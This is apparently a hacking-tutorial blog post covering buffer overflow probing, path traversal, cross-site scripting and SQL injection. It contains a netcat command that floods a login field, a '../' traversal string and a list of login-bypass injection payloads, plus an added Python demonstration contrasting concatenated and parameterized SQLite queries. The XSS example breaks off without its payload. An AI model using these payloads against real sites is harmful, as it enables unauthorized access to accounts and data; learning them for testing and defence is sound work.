-: Input Validation Attacks :-
Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.
The most common input validation attacks are as follows:
1) Buffer Overflow :- Buffer overflow attacks are enabled by sloppy programming or mismanagement of memory by the application developers. Buffer overflows may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It is also possible that an overflow exists in a language's (PHP, Java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo -e "GET /login.php?user=\
> `perl -e 'print "a" x 500'` HTTP/1.0\n\n" | \
nc -vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.
2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, e.g., "../../../../../../../../../boot.ini". This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root can be targeted, with URLs like the following:
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm
3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, "Invalid password". Seeing a string on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=
-: SQL Injection Attacks :-
You should look for pages like ASP, ASPX, JSP, CGI, or PHP. Look especially for URLs that take parameters, like:
http://example.com/login.asp?id=10

Is it vulnerable? Start with the single quote trick. Input something like:
hi' or 1=1--
into the login field, the password field, or even the URL. Example:
Login: hi' or 1=1--
Pass: hi' or 1=1--
http://example.com/login.asp?id=hi' or 1=1--

You can do this with a hidden field too: view the HTML source of the page, save it to your hard disk, and modify the URL and hidden field accordingly. If luck is on your side, you will get logged in without any login name or password.

But why ' or 1=1-- ? Take an ASP page that links you to another page with the following URL:
http://example.com/search.asp?category=sports
In this URL, 'category' is the variable name and 'sports' is its value. This request fires the following query on the database in the background:
SELECT * FROM search WHERE category='sports'
where 'search' is the name of a table already present in some database. So this query returns all the entries from table 'search' that come under the category 'sports'. Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--
Now our variable 'category' equals "sports' or 1=1-- ", which fires an SQL query on the database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
The query now selects everything from the 'search' table regardless of whether category is equal to 'sports' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#". However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try:
' or 'a'='a
It should return the same result.
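The login and search queries described above, run against an in-memory SQLite database, as an added example that is not part of the original post: the concatenated query accepts the hi' or 1=1-- input as a valid login, while the same query with bound parameters treats it as plain data, which is the fix to prefer over filtering characters. The table names, columns and rows are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed stand-ins for the post's login and 'search' tables.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'correct-horse');
        CREATE TABLE search(category TEXT, item TEXT);
        INSERT INTO search VALUES ('sports', 'football'), ('news', 'budget');
    """)
    return db


def login_vulnerable(db, user, pw):
    # Concatenation: the quote in hi' or 1=1-- closes the literal, 'or 1=1'
    # makes the WHERE clause true for every row, and '--' comments out the
    # rest of the statement, including the password check.
    sql = f"SELECT username FROM users WHERE username='{user}' AND password='{pw}'"
    return [row[0] for row in db.execute(sql)]


def login_safe(db, user, pw):
    # Bound parameters: the driver passes each input as one string value, so
    # quotes, dashes and keywords inside it are data, never SQL syntax.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (user, pw))]


def search_vulnerable(db, category):
    # The post's search.asp query, built by concatenation.
    sql = f"SELECT item FROM search WHERE category='{category}'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, category):
    # The same query with the category bound as a parameter.
    sql = "SELECT item FROM search WHERE category=?"
    return [row[0] for row in db.execute(sql, (category,))]


if __name__ == "__main__":
    db = make_db()
    payload = "hi' or 1=1--"
    print("vulnerable login: ", login_vulnerable(db, payload, payload))  # ['alice']
    print("safe login:       ", login_safe(db, payload, payload))        # []
    print("vulnerable search:", search_vulnerable(db, "sports' or 1=1--"))  # ['football', 'budget']
    print("safe search:      ", search_safe(db, "sports' or 1=1--"))        # []
```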
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

Countermeasures? Filter out characters like ' " - / \ ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie

-: Google Hacking :-
Some of the most powerful and very effective google search queries are added on Google Dorks! page.